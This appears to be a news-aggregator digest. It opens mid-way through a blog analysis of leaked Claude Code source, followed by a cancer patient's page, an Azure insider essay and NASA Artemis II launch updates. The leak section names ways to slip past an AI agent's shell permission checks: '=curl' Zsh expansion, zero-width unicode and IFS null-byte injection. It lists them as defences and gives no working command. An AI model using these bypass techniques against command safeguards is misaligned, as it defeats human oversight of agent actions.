The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 con­sec­u­tive fail­ures, com­paction is dis­abled for the rest of the ses­sion. Three lines of code to stop burn­ing a quar­ter mil­lion API calls a day.

Throughout the code­base, there are ref­er­ences to a fea­ture-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an un­re­leased au­tonomous agent mode that in­cludes:

This is prob­a­bly the biggest prod­uct roadmap re­veal from the leak.

The im­ple­men­ta­tion is heav­ily gated, so who knows how far along it is. But the scaf­fold­ing for an al­ways-on, back­ground-run­ning agent is there.

Tomorrow is April 1st, and the source con­tains what’s al­most cer­tainly this year’s April Fools’ joke: buddy/​com­pan­ion.ts im­ple­ments a Tamagotchi-style com­pan­ion sys­tem. Every user gets a de­ter­min­is­tic crea­ture (18 species, rar­ity tiers from com­mon to leg­endary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) gen­er­ated from their user ID via a Mulberry32 PRNG. Species names are en­coded with String.fromCharCode() to dodge build-sys­tem grep checks.

The ter­mi­nal ren­der­ing in ink/​screen.ts and ink/​op­ti­mizer.ts bor­rows game-en­gine tech­niques: an Int32Array-backed ASCII char pool, bit­mask-en­coded style meta­data, a patch op­ti­mizer that merges cur­sor moves and can­cels hide/​show pairs, and a self-evict­ing line-width cache (the source claims ~50x re­duc­tion in string­Width calls dur­ing to­ken stream­ing”). Seems like overkill un­til you re­mem­ber these things stream to­kens one at a time.

Every bash com­mand runs through 23 num­bered se­cu­rity checks in bash­Se­cu­rity.ts: 18 blocked Zsh builtins, de­fense against Zsh equals ex­pan­sion (=curl by­pass­ing per­mis­sion checks for curl), uni­code zero-width space in­jec­tion, IFS null-byte in­jec­tion, and a mal­formed to­ken by­pass found dur­ing HackerOne re­view. I haven’t seen an­other tool with this spe­cific a Zsh threat model.

Prompt cache eco­nom­ics clearly drive a lot of the ar­chi­tec­ture. prompt­Cache­BreakDe­tec­tion.ts tracks 14 cache-break vec­tors, and there are sticky latches” that pre­vent mode tog­gles from bust­ing the cache. One func­tion is an­no­tated DANGEROUS_uncachedSystemPromptSection(). When you’re pay­ing for every to­ken, cache in­val­i­da­tion stops be­ing a com­puter sci­ence joke and be­comes an ac­count­ing prob­lem.

The multi-agent co­or­di­na­tor in co­or­di­na­tor­Mode.ts is in­ter­est­ing be­cause the or­ches­tra­tion al­go­rithm is a prompt, not code. It man­ages worker agents through sys­tem prompt in­struc­tions like Do not rub­ber-stamp weak work” and You must un­der­stand find­ings be­fore di­rect­ing fol­low-up work. Never hand off un­der­stand­ing to an­other worker.”

The code­base also has some rough spots. print.ts is 5,594 lines long with a sin­gle func­tion span­ning 3,167 lines and 12 lev­els of nest­ing. They use Axios for HTTP, which is funny tim­ing given that Axios was just com­pro­mised on npm with ma­li­cious ver­sions drop­ping a re­mote ac­cess tro­jan.

Some peo­ple are down­play­ing this be­cause Google’s Gemini CLI and OpenAI’s Codex are al­ready open source. But those com­pa­nies open-sourced their agent SDK (a toolkit), not the full in­ter­nal wiring of their flag­ship prod­uct.

The real dam­age is­n’t the code. It’s the fea­ture flags. KAIROS, the anti-dis­til­la­tion mech­a­nisms: these are prod­uct roadmap de­tails that com­peti­tors can now see and re­act to. The code can be refac­tored. The strate­gic sur­prise can’t be un-leaked.

And here’s the kicker: Anthropic ac­quired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, re­ports that source maps are served in pro­duc­tion mode even though Bun’s own docs say they should be dis­abled. The is­sue is still open. If that’s what caused the leak, then Anthropic’s own tool­chain shipped a known bug that ex­posed their own pro­duc­t’s source code.

As one Twitter re­ply put it: accidentally ship­ping your source map to npm is the kind of mis­take that sounds im­pos­si­ble un­til you re­mem­ber that a sig­nif­i­cant por­tion of the code­base was prob­a­bly writ­ten by the AI you are ship­ping.”

...

Read the original on alex000kim.com »

6 1,279 shares, 49 trendiness

Cancer

I’ve taken agency in the treat­ment of my bone can­cer (osteosarcoma in the T5 ver­te­brae of the up­per spine). After I’ve ran out of stan­dard of care treat­ment op­tions and there were no tri­als avail­able for me I’ve started do­ing: max­i­mum di­ag­nos­tics, cre­ated new treat­ments, started do­ing treat­ments in par­al­lel, and scal­ing this for oth­ers.

Elliot Hershberg wrote a great and ex­ten­sive ar­ti­cle about my can­cer jour­ney.

My can­cer jour­ney deck is em­bed­ded be­low, there also is a record­ing of an OpenAI Forum pre­sen­ta­tion. The com­pa­nies we are build­ing to scale this ap­proach for oth­ers can be found at evenone.ven­tures. Please scroll fur­ther on this page for my data and other in­for­ma­tion.

I think the med­ical in­dus­try can be more pa­tient first, see this great ar­ti­cle by Ruxandra https://​www.writ­in­gruxan­dra­bio.com/​p/​the-bu­reau­cracy-block­ing-the-chance

For my data please see https://​os­teosarc.com/ that in­cludes my treat­ment time­line and a data overview doc with 25TB of pub­licly read­able Google Cloud buck­ets.

Please sub­scribe to my mail­ing list

...

Read the original on sytse.com »

7 1,129 shares, 49 trendiness

How Microsoft Vaporized a Trillion Dollars

This is the first of a se­ries of ar­ti­cles in which you will learn about what may be one of the sil­li­est, most pre­ventable, and most costly mishaps of the 21st cen­tury, where Microsoft all but lost OpenAI, its largest cus­tomer, and the trust of the US gov­ern­ment.

I joined Azure Core on the dull Monday morn­ing of May 1st, 2023, as a se­nior mem­ber of the Overlake R&D team, the folks be­hind the Azure Boost of­fload card and net­work ac­cel­er­a­tor.

I was­n’t new to Azure, hav­ing run what is likely the longest-run­ning pro­duc­tion sub­scrip­tion of this cloud ser­vice, which launched in February 2010 as Windows Azure.

I was­n’t new to Microsoft ei­ther, hav­ing been part of the Windows team since 1/1/2013 and later helped mi­grate SharePoint Online to Azure, be­fore join­ing the Core OS team as a ker­nel en­gi­neer, where I no­tably helped im­prove the ker­nel and helped in­vent and de­liver the Container plat­form that sup­ports Docker, Azure Kubernetes, Azure Container Instances, Azure App Services, and Windows Sandbox, all ship­ping tech­nolo­gies that re­sulted in mul­ti­ple granted patents.

Furthermore, I con­tributed to brain­storm­ing the early Overlake cards in 2020-2021, draft­ing a pro­posal for a Host OS Accelerator Card com­mu­ni­ca­tion pro­to­col and net­work stack, when all we had was a de­bug­ger’s se­r­ial con­nec­tion. I also served as a Core OS spe­cial­ist, help­ing Azure Core en­gi­neers di­ag­nose deep OS is­sues.

I re­joined in 2023 as an Azure ex­pert on day one, hav­ing con­tributed to the de­vel­op­ment of some of the tech­nolo­gies on which Azure re­lies and hav­ing used the plat­form for more than a decade, both out­side and in­side Microsoft at a global scale.

As a re­turn­ing em­ployee, I skipped the New Employee Orientation and had my Global Security in­vite for 12 noon to pick up my badge, but my fu­ture man­ager asked if I could come in ear­lier, as the team had their monthly plan­ning meet­ing that morn­ing.

I, of course, agreed and ar­rived a few min­utes be­fore 10 am at the en­trance of the Studio X build­ing, not far from The Commons on the West Campus in Redmond. A man showed up in the lobby and opened the door for me. I fol­lowed him to a meet­ing room through a labyrinth of cor­ri­dors.

The room was chock-full, with more peo­ple on a live con­fer­ence call. The dev man­ager, the leads, the ar­chi­tects, the prin­ci­pal and se­nior en­gi­neers shared the space with what ap­peared to be new hires and ju­nior per­son­nel.

The screen pro­jected a slide where I rec­og­nized a num­ber of fa­mil­iar acronyms, like COM, WMI, perf coun­ters, VHDX, NTFS, ETW, and a dozen oth­ers, mixed with new Azure-related ones, in an im­broglio of boxes linked by ar­rows.

I sat qui­etly at the back while a man was walk­ing the room through a big port­ing plan of their cur­rent stack to the Overlake ac­cel­er­a­tor. As I lis­tened, it was not im­me­di­ately clear what that se­ries of boxes with Windows user-mode and ker­nel com­po­nents had to do with that plan.

After a few min­utes, I risked a ques­tion: Are you plan­ning to port those Windows fea­tures to Overlake? The an­swer was yes, or at least they were look­ing into it. The dev man­ager showed some doubt, and the man replied that they could at least ask a cou­ple of ju­nior devs to look into it.”

The room re­mained silent for an in­stant. I had seen the hard­ware specs for the SoC on the Overlake card in my pre­vi­ous tenure: the RAM ca­pac­ity and the power bud­get, which was just a tiny frac­tion of the TDP you can ex­pect from a reg­u­lar server CPU.

The hard­ware folks I had spo­ken with told me they could only spare 4KB of dual-ported mem­ory on the FPGA for my door­bell shared-mem­ory com­mu­ni­ca­tion pro­to­col.

Everything was nim­ble, ef­fi­cient, and power-savvy, and the team I had joined 10 min­utes ear­lier was se­ri­ously con­sid­er­ing port­ing half of Windows to that tiny, fan­less, Linux-running chip the size of a fin­ger­nail.

That felt like Elon talk­ing about col­o­niz­ing Mars: just nuke the poles then grow an at­mos­phere! Easier said than done, uh?

That en­tire 122-strong org was knee-deep in im­pos­si­ble ru­mi­na­tions in­volv­ing port­ing Windows to Linux to sup­port their ex­ist­ing VM man­age­ment agents.

The man was a Principal Group Engineering Manager over­see­ing a chunk of the soft­ware run­ning on each Azure node; his boss, a Partner Engineering Manager, was in the room with us, and they re­ally con­tem­plated port­ing Windows to Linux to sup­port their cur­rent soft­ware.

At first, I ques­tioned my un­der­stand­ing. Was that se­ri­ous? The rest of the talk left no doubt: the plan was out­lined, and the dev leads were tasked with con­tribut­ing peo­ple to the ef­fort. It was im­me­di­ately clear to me that this plan would never suc­ceed and that the org needed a lot of help.

That first hour in the new role left me with a mix of strange feel­ings, stu­pe­fac­tion, and in­credulity.

The stack was hit­ting its scal­ing lim­its on a 400 Watt Xeon at just a few dozen VMs per node, I later learned, a far cry from the 1,024 VMs limit I knew the hy­per­vi­sor was ca­pa­ble of, and was a noisy neigh­bor con­sum­ing so many re­sources that it was caus­ing jit­ter ob­serv­able from the cus­tomer VMs.

There is no di­men­sion in the uni­verse where this stack would fit on a tiny ARM SoC and scale up by many fac­tors. It was not go­ing to hap­pen.

I have seen a lot in my decades of in­dus­try (and Microsoft) ex­pe­ri­ence, but I had never seen an or­ga­ni­za­tion so far from re­al­ity. My day-one prob­lem was there­fore not to ramp up on new tech­nol­ogy, but rather to con­vince an en­tire org, up to my skip-skip-level, that they were on a death march.

Somewhere, I knew it was go­ing to be a fierce up­hill bat­tle. As you can imag­ine, it did­n’t go well, as you will later learn.

I spent the next few days read­ing more about the plans, study­ing the cur­rent sys­tems, and vis­it­ing old friends in Core OS, my alma mater. I was lost away from home in a bizarre ter­ri­tory where peo­ple made plans that did­n’t make sense with the aplomb of a drunk LLM.

I no­tably spent more than 90 min­utes chat­ting in per­son with the head of the Linux System Group, a solid scholar with a PhD from INRIA, who was among the folks who hired me on the ker­nel team years ear­lier.

His org is re­spon­si­ble for de­liv­er­ing Mariner Linux (now Azure Linux) and the trimmed-down dis­tro run­ning on the Overlake / Azure Boost card. He kindly an­swered all my ques­tions, and I learned that they had iden­ti­fied 173 agents (one hun­dred sev­enty-three) as can­di­dates for port­ing to Overlake.

I later re­searched this fur­ther and found that no one at Microsoft, not a sin­gle soul, could ar­tic­u­late why up to 173 agents were needed to man­age an Azure node, what they all did, how they in­ter­acted with one an­other, what their fea­ture set was, or even why they ex­isted in the first place.

Azure sells VMs, net­work­ing, and stor­age at the core. Add ob­serv­abil­ity and ser­vic­ing, and you should be good. Everything else, SQL, K8s, AI work­loads, and what­not all build on VMs with xPU, net­work­ing, and stor­age, and the heavy lift­ing to make the magic hap­pen is done by the good Core OS folks and the hy­per­vi­sor.

How the Azure folks came up with 173 agents will prob­a­bly re­main a mys­tery, but it takes a se­ri­ous amount of mis­un­der­stand­ing to get there, and this is also how dis­as­ters are built.

Now, fathom for a sec­ond that this pile of un­con­trolled stuff” is or­ches­trat­ing the VMs run­ning Anthropic’s Claude, what’s left of OpenAI’s APIs on Azure, SharePoint Online, the gov­ern­ment clouds and other mis­sion-crit­i­cal in­fra­struc­ture, and you’ll be close to un­der­stand­ing how a grain of sand in that frag­ile pileup can cause a global col­lapse, with se­ri­ous National Security im­pli­ca­tions as well as po­ten­tial busi­ness-end­ing con­se­quences for Microsoft.

We are still far from the va­por­ized tril­lion in mar­ket cap, my let­ters to the CEO, to the Microsoft Board of Directors, and to the Cloud + AI EVP and their to­tal si­lence, the quasi-loss of OpenAI, the breach of trust with the US gov­ern­ment as pub­licly stated by the Secretary of Defense, the wasted en­gi­neer­ing ef­forts, the Rust man­date, my stint on the OpenAI bare-metal team in Azure Core, the es­cort ses­sions from China and else­where, and the de­layed fea­tures pub­licly im­plied as ship­ping since 2023, be­fore the work even be­gan.

If you’re run­ning pro­duc­tion work­loads on Azure or re­ly­ing on it for mis­sion-crit­i­cal sys­tems, this story mat­ters more than you think.

...

Read the original on isolveproblems.substack.com »

8 1,069 shares, 22 trendiness

Artemis II Launch Day Updates

Live launch day up­dates for NASAs Artemis II test flight will be pub­lished on this page. All times are Eastern.

The Orion space­craft’s SAWs (solar ar­rays wings) have fully de­ployed, com­plet­ing a key con­fig­u­ra­tion step for the Artemis II mis­sion. Flight con­trollers in Houston con­firmed that all four wings un­folded as planned, lock­ing into place and be­gin­ning to draw power.

Each so­lar ar­ray wing ex­tends out­ward from the European Service Module, giv­ing Orion, named Integrity, a wingspan of roughly 63 feet when fully de­ployed. Each wing has 15,000 so­lar cells to con­vert sun­light to elec­tric­ity. The ar­rays can turn on two axes that al­low them to ro­tate and track the Sun, max­i­miz­ing power gen­er­a­tion as the space­craft changes at­ti­tude dur­ing its time in Earth or­bit and on its out­bound jour­ney to the Moon.

The next ma­jor mile­stones are the PRM (perigee raise ma­neu­ver) and ARB (apogee raise burn) that will in­crease the low­est and high­est points of the Orion space­craft’s or­bit and pre­pare the space­craft for deep‑space op­er­a­tions.

Following the burns, NASA will hold a post­launch news con­fer­ence at 9 p.m. from Kennedy Space Center in Florida. Following the news con­fer­ence, the Artemis II crew will be­gin prepa­ra­tions for Orion’s prox­im­ity op­er­a­tions demon­stra­tion. This demon­stra­tion will test the abil­ity to man­u­ally ma­neu­ver Orion rel­a­tive to an­other space­craft, in this case, the in­terim cryo­genic propul­sion stage af­ter sep­a­ra­tion.

Coverage on NASA+ will soon con­clude, how­ever 24/7 cov­er­age will con­tinue on NASAs YouTube chan­nel, and keep fol­low­ing the Artemis blog for live up­dates of key mile­stones through­out the mis­sion.

Main en­gine cut­off of the SLS (Space Launch System) core stage is com­plete, and the core stage has suc­cess­fully sep­a­rated from the in­terim cryo­genic propul­sion stage and the Orion space­craft. This marks the end of the first ma­jor propul­sion phase of the Artemis II mis­sion and the tran­si­tion to up­per‑stage op­er­a­tions.

The next ma­jor mile­stone is the de­ploy­ment of the space­craft’s SAWs (solar ar­ray wings) sched­uled to be­gin ap­prox­i­mately 18 min­utes af­ter launch. Once ex­tended, the four SAWs will pro­vide con­tin­u­ous elec­tri­cal power to the space­craft through­out its jour­ney, sup­port­ing life‑sup­port sys­tems, avion­ics, com­mu­ni­ca­tions, and on­board op­er­a­tions. Deployment is a crit­i­cal step in con­fig­ur­ing Orion for the re­main­der of its time in Earth or­bit and for the out­bound trip to the Moon.

The space­craft adapter jet­ti­son fair­ings that en­close the ser­vice mod­ule and the launch abort sys­tem have sep­a­rated from the Orion space­craft. With the rocket and space­craft now fly­ing above the dens­est lay­ers of Earth’s at­mos­phere, Orion no longer re­quires the pro­tec­tive struc­tures that shielded it dur­ing the early, high‑dy­namic‑pres­sure por­tion of launch.

The next ma­jor mile­stone is core stage sep­a­ra­tion and Interim Cryogenic Propulsion Stage ig­ni­tion.

The SLS (Space Launch System) twin solid rocket boost­ers have sep­a­rated. The boost­ers, each stand­ing 177 feet tall and gen­er­at­ing more than 3.6 mil­lion pounds of thrust at liftoff, pro­vide most of the rock­et’s power dur­ing the first two min­utes of flight and sep­a­ra­tion re­duces mass and al­lows the core stage to con­tinue pro­pelling the Orion space­craft, named Integrity, to­ward or­bit.

With the boost­ers now clear, the SLS core stage re­mains the pri­mary source of thrust.

In about one minute, the space­craft adapter jet­ti­son fair­ings that en­close Orion’s ser­vice mod­ule and the launch abort sys­tem will sep­a­rate from the space­craft.

6:35 p.m.

NASA’s Artemis II SLS (Space Launch System) rocket, with the Orion spacecraft atop car­ry­ing NASA as­tro­nauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen, lifted off from Kennedy Space Center’s Launch Complex 39B in Florida at 6:35 p.m. EDT to be­gin its jour­ney to deep space.

The twin solid rocket boost­ers ig­nited first, de­liv­er­ing more than 75% of the thrust needed to lift the 5.75-million-pound rocket off the pad. Their com­bined power, along with the four RS-25 en­gines al­ready at full thrust, gen­er­ated an in­cred­i­ble 8.8 mil­lion pounds of force at liftoff. As the rocket rose, the um­bil­i­cals — which pro­vided power, fuel, and data con­nec­tions dur­ing prelaunch — dis­con­nected and re­tracted into pro­tec­tive hous­ings. This en­sured the ve­hi­cle is free from ground sys­tems and fully au­tonomous for flight.

The ap­prox­i­mately 10-day Artemis II mis­sion around the Moon is the first crewed flight un­der NASAs Artemis cam­paign. It will help test the sys­tems and hard­ware needed to con­tinue send­ing as­tro­nauts on in­creas­ingly dif­fi­cult mis­sions to ex­plore more of the Moon for sci­en­tific dis­cov­ery, eco­nomic ben­e­fits, and to con­tinue build­ing to­ward the first crewed mis­sions to Mars.

Below are the as­cent mile­stones that will oc­cur lead­ing up to core stage sep­a­ra­tion. Times may vary by sev­eral sec­onds.

The Artemis II count­down has en­tered ter­mi­nal count, and the ground launch se­quencer has taken con­trol, or­ches­trat­ing a pre­cise se­ries of au­to­mated com­mands to pre­pare the SLS (Space Launch System) rocket and Orion space­craft for liftoff at a T-0 time of 6:35 p.m. EDT.

The ground launch se­quencer en­sures that all sys­tems – from propul­sion to avion­ics – tran­si­tion into flight mode. Key ac­tions per­formed in­clude pres­sur­iz­ing pro­pel­lant tanks for op­ti­mal en­gine per­for­mance, ac­ti­vat­ing flight soft­ware and switch­ing con­trol from ground to on­board sys­tems, and per­form­ing fi­nal health checks across thou­sands of sen­sors to con­firm readi­ness.

This au­to­mated se­quence min­i­mizes hu­man in­ter­ven­tion, re­duc­ing risk and en­sur­ing syn­chro­niza­tion across com­plex sub­sys­tems. For Artemis II, this mo­ment marks the cul­mi­na­tion of years of plan­ning and test­ing, as the mis­sion moves from ground op­er­a­tions to the thresh­old of launch.

See the list be­low of the ter­mi­nal count mile­stones:

* T-4M — GLS is go for core stage aux­il­iary power unit (APU) start

Inside the ter­mi­nal count­down, teams have a few op­tions to hold the count if needed.

The launch team can hold at 6 min­utes for the du­ra­tion of the launch win­dow, less the 6 min­utes needed to launch, with­out hav­ing to re­cy­cle back to 10 min­utes.

If teams need to stop the clock be­tween T-6 min­utes and T-1 minute, 30 sec­onds, they can hold for up to 3 min­utes and re­sume the clock to launch. If they re­quire more than 3 min­utes of hold time, the count­down would re­cy­cle back to T-10.

If the clock stops af­ter T-1 minute and 30 sec­onds, but be­fore the au­to­mated launch se­quencer takes over, then teams can re­cy­cle back to T-10 to try again, pro­vided there is ad­e­quate launch win­dow re­main­ing.

After han­dover to the au­to­mated launch se­quencer, any is­sue that would stop the count­down would lead to con­clud­ing the launch at­tempt for that day.

Artemis II Launch Director Charlie Blackwell-Thompson conducted one of the most im­por­tant steps be­fore liftoff: the go/no-go” poll for the team to pro­ceed with the fi­nal 10 min­utes of the count­down known as ter­mi­nal count.

A unan­i­mous go” across the board sig­nals that Artemis II is fully pre­pared to pro­ceed to­ward launch. This mo­ment rep­re­sents the cul­mi­na­tion of years of plan­ning and hours of metic­u­lous pre-launch work, bring­ing the mis­sion to the thresh­old of his­tory.

The launch team has made the de­ci­sion to ex­tend the T-10 minute hold ahead of to­day’s launch to give en­gi­neers time to work through fi­nal prepa­ra­tions for liftoff. There is a two-hour win­dow in which Artemis II could launch, and a new liftoff time will be set shortly

NASAs Artemis II closeout crew com­pleted its fi­nal tasks and de­parted Launch Complex 39B at NASAs Kennedy Space Center in Florida. After hours of metic­u­lous work as­sist­ing the as­tro­nauts with suit-up, hatch clo­sure, and crit­i­cal space­craft checks, the team ex­ited the White Room and left the Orion space­craft sealed and ready for flight.

This de­par­ture marks a ma­jor tran­si­tion in launch op­er­a­tions: the space­craft is now fully con­fig­ured, and re­spon­si­bil­ity shifts to the launch con­trol team for the fi­nal count­down. The close­out crew’s pre­ci­sion and ex­per­tise en­sure that every con­nec­tion, seal, and sys­tem is ver­i­fied be­fore they step away – mak­ing this mo­ment a key mile­stone on the path to liftoff.

Engineers in­ves­ti­gated a sen­sor on the launch abort sys­tem’s at­ti­tude con­trol mo­tor con­troller bat­tery that showed a higher tem­per­a­ture than would be ex­pected. It is be­lieved to be an in­stru­men­ta­tion is­sue and will not af­fect to­day’s launch.

The weather con­tin­ues to co­op­er­ate and has now been up­graded to 90% go for launch.

Engineers have now re­solved an is­sue with the hard­ware that com­mu­ni­cates with the flight ter­mi­na­tion sys­tem that would have pre­vented the ground from send­ing a sig­nal to de­struct the rocket if it were to veer off course dur­ing as­cent, to pro­tect pub­lic safety. A con­fi­dence test was per­formed to en­sure that the hard­ware is ready to sup­port to­day’s launch.

Meanwhile, tech­ni­cians have com­pleted the launch abort sys­tem hatch clo­sure – an es­sen­tial step that en­sures the Orion space­craft is fully sealed and ready for flight. The hatch pro­vides an ad­di­tional pro­tec­tive bar­rier for the crew mod­ule, de­signed to safe­guard as­tro­nauts dur­ing the Artemis II flight path and, if nec­es­sary, en­able a rapid es­cape in the event of an emer­gency.

During this phase, the close­out team ver­i­fies hatch align­ment, en­gages lock­ing mech­a­nisms, and con­firms pres­sure in­tegrity. These checks guar­an­tee that the launch abort sys­tem hatch can per­form its func­tion flaw­lessly, main­tain­ing struc­tural in­tegrity un­der ex­treme launch con­di­tions. With the hatch se­cured, Orion en­ters its fi­nal con­fig­u­ra­tion for liftoff, mark­ing one of the last ma­jor mile­stones be­fore fu­el­ing and launch.

Although the count­down to to­day’s Artemis II launch is con­tin­u­ing to progress, the Eastern Range has iden­ti­fied an is­sue that they are cur­rently work­ing to re­solve re­lated to their com­mu­ni­ca­tion with the flight ter­mi­na­tion sys­tem. The flight ter­mi­na­tion sys­tem is a safety sys­tem that al­lows en­gi­neers on the ground to send a sig­nal to de­struct the rocket if it were to veer off course dur­ing as­cent, to pro­tect pub­lic safety. Without as­sur­ance that this sys­tem would work if needed, to­day’s launch would be no-go. However, en­gi­neers have de­vised a way to ver­ify the sys­tem and are cur­rently prepar­ing to test this so­lu­tion.

Technicians be­gan in­stalling the crew mod­ule hatch ser­vice panel on the Orion space­craft, an im­por­tant step in fi­nal launch prepa­ra­tions. This panel pro­tects key con­nec­tions and en­sures the hatch area is se­cure for flight.

As part of cur­rent close­out ac­tiv­i­ties, teams are con­firm­ing all sys­tems around the hatch are prop­erly sealed and ready for the mis­sion.

With the hatch area se­cured, teams will con­tinue fi­nal checks and count­down op­er­a­tions at Launch Pad 39B at NASAs Kennedy Space Center in Florida, bring­ing us closer to send­ing as­tro­nauts on a his­toric jour­ney around the Moon.

NASA en­gi­neers have con­ducted coun­ter­bal­ance mech­a­nism op­er­a­tions and are now per­form­ing hatch seal pres­sure de­cay checks in­side the White Room at Launch Complex 39B. These steps en­sure Orion’s hatch main­tains proper pres­sure in­tegrity and that the coun­ter­bal­ance sys­tem func­tions as de­signed for launch con­di­tions.

The coun­ter­bal­ance mech­a­nism is a pre­ci­sion-en­gi­neered as­sem­bly that off­sets the weight of the crew mod­ule hatch, al­low­ing tech­ni­cians to open and close it smoothly with­out in­tro­duc­ing stress on the hinge or seal. This sys­tem uses cal­i­brated springs and dampers to main­tain align­ment and pre­vent sud­den move­ments, which is es­sen­tial for pre­serv­ing the hatch’s air­tight seal. During this phase, tech­ni­cians ver­ify the mech­a­nis­m’s load dis­tri­b­u­tion and con­firm that its lock­ing fea­tures en­gage cor­rectly un­der sim­u­lated launch loads.

Following these ad­just­ments, the team per­forms seal pres­sur­iza­tion de­cay checks – mon­i­tor­ing pres­sure loss over time to con­firm the hatch’s in­tegrity. These checks are vi­tal for as­tro­naut safety, en­sur­ing the cabin re­mains se­cure in all mis­sion phases.

NASAs Artemis II close­out crew is now com­plet­ing one of the most crit­i­cal steps be­fore launch: prepar­ing and clos­ing the crew mod­ule hatch to the Orion space­craft. Inside the White Room at Launch Complex 39B, the close­out crew is work­ing metic­u­lously to in­spect seals, se­cure fas­ten­ers, and ver­ify that the hatch is air­tight.

This process en­sures Orion is fully pres­sur­ized and ready for flight. Once the hatch is closed and locked, the as­tro­nauts are of­fi­cially sealed in­side their space­craft, mark­ing a ma­jor mile­stone on the path to liftoff.

NASAs Artemis II crew mem­bers are board­ing the agen­cy’s Orion space­craft to be­gin com­mu­ni­ca­tion checks to con­firm voice links with mis­sion con­trol and on­board sys­tems.

Before en­ter­ing the space­craft that will be their home on the ap­prox­i­mately 10-day jour­ney around the Moon and back, all four crew­mates signed the in­side of the White Room, an area at the end of the crew ac­cess arm that pro­vides ac­cess to the space­craft. The term White Room” dates to NASAs Gemini pro­gram, and to honor this hu­man space­flight tra­di­tion, the room re­mains white to­day.

The Artemis II closeout crew is now work­ing to help the as­tro­nauts en­ter the Orion space­craft and make fi­nal prepa­ra­tions for their nearly 700,000-mile trip to the Moon and back. As part of the process, the close­out crew is help­ing the as­tro­nauts don their Orion Crew Survival System helmets and gloves, as well as board Orion and get buck­led in.

A short time from now, the close­out crew will close the crew mod­ule and ex­te­rior launch abort sys­tem hatches. Even a sin­gle strand of hair in­side the hatch doors could po­ten­tially pose is­sues with clos­ing ei­ther hatch, so the process is care­fully done and takes up to four hours. Each step in the close­out process en­sures air­tight seals and com­mu­ni­ca­tion readi­ness for the mis­sion ahead.

Following com­mu­ni­ca­tion checks, the team per­formed suit leak checks – a vi­tal safety pro­ce­dure en­sur­ing each pres­sure suit main­tains in­tegrity in case of cabin de­pres­sur­iza­tion. These op­er­a­tions are es­sen­tial for crew readi­ness and mis­sion as­sur­ance, mark­ing one of the fi­nal phases be­fore hatch clo­sure and launch prepa­ra­tions.

With assistance from the close­out crew, the Artemis II crew are care­fully don­ning their hel­mets and gloves – fi­nal­iz­ing suit in­tegrity checks be­fore board­ing the Orion space­craft.

This step is more than cer­e­mo­nial; it en­sures air­tight seals and com­mu­ni­ca­tion readi­ness for the mis­sion ahead. The close­out crew plays a vi­tal role, guid­ing the as­tro­nauts through these pro­ce­dures and con­firm­ing every con­nec­tion is se­cure be­fore hatch clo­sure.

Stay tuned as we con­tinue to fol­low the Artemis II team through each count­down mile­stone on their path to liftoff.

NASAs Artemis II crew NASA as­tro­nauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen, arrived at Launch Complex 39B at the agen­cy’s Kennedy Space Center in Florida, where the agen­cy’s SLS (Space Launch System) rocket with Orion space­craft atop stands ready for launch. The open­ing of to­day’s launch win­dow is slated for just over 4 hours from now, at 6:24 p.m. EDT.

In the next few min­utes, the crew will take the el­e­va­tor up the pad’s fixed ser­vice struc­ture and walk down the cli­mate-con­trolled crew ac­cess arm to the White Room, their fi­nal stop be­fore climb­ing aboard their Orion space­craft. In this clean, con­trolled en­vi­ron­ment at the end of the crew ac­cess arm, the close­out crew will as­sist the as­tro­nauts with hatch op­er­a­tions and ver­ify that all safety sys­tems are ready for launch.

Since the late 1960s, pads A and B at Kennedy’s Launch Complex 39 have sup­ported America’s ma­jor space pro­grams, with Pad A used most fre­quently for launches un­der the Space Shuttle Program. After the re­tire­ment of the shut­tle in 2011, Pad A helped usher in a new era of hu­man space­flight as launch pad for the agen­cy’s Commercial Crew Program, which re­turned hu­man space­flight ca­pa­bil­ity to the United States. Pad B saw the launch of NASAs Artemis I mis­sion in November 2022 and will con­tinue to be the pri­mary launch pad for America’s ef­forts to re­turn to hu­mans the Moon.

Just mo­ments ago, NASAs Artemis II flight crew be­gan the walk that every NASA as­tro­naut has made since Apollo 7 in 1968, head­ing to the el­e­va­tor and down through the dou­ble doors be­low the Neil A. Armstrong Building’s Astronaut Crew Quarters at NASAs Kennedy Space Center in Florida.

Before they left the suit-up room, the crew com­pleted one last piece of un­fin­ished busi­ness — a card game. A long-held space­flight tra­di­tion, NASA crews play cards be­fore leav­ing the crew quar­ters ahead of launch un­til the com­man­der, in this in­stance NASA as­tro­naut Reid Wiseman, loses. It is hoped that by los­ing, the com­man­der burns off all his or her bad luck, thereby clear­ing the mis­sion for only good luck.

NASAs Artemis II is the first crewed mis­sion of the Artemis pro­gram and will carry Wiseman and fel­low NASA as­tro­nauts Vic­tor Glover and Christina Koch, as well as CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen on an ap­prox­i­mately 10-day mis­sion around the Moon and back to Earth.

The first crewed deep-space flight in over 50 years, Artemis II is ex­pected to send the crew far­ther from Earth than any pre­vi­ous hu­man mis­sion, po­ten­tially break­ing the record of about 248,655 miles (400,171 km) from Earth set by Apollo 13 dur­ing its lu­nar free-re­turn tra­jec­tory. This mile­stone will oc­cur dur­ing the lu­nar flyby phase, when the crew trav­els on a free-re­turn tra­jec­tory around the Moon, which al­lows the space­craft to loop around the Moon and re­turn to Earth with­out en­ter­ing lu­nar or­bit.

During the test flight, NASA will test life-sup­port sys­tems and crit­i­cal op­er­a­tions in deep space, paving the way for fu­ture lu­nar land­ings and Mars ex­plo­ration.

Having received good­byes and well wishes from their fam­i­lies and friends, the crew em­barks on the 20-minute jour­ney to Kennedy’s Launch Pad 39B and their await­ing space­craft.

NASAs pad res­cue and close­out crew teams have ar­rived at Launch Complex 39B at the agen­cy’s Kennedy Space Center in Florida to en­sure safety and readi­ness dur­ing the crit­i­cal fu­el­ing op­er­a­tions. These spe­cial­ized teams play a vi­tal role in pro­tect­ing per­son­nel and hard­ware through­out the count­down.

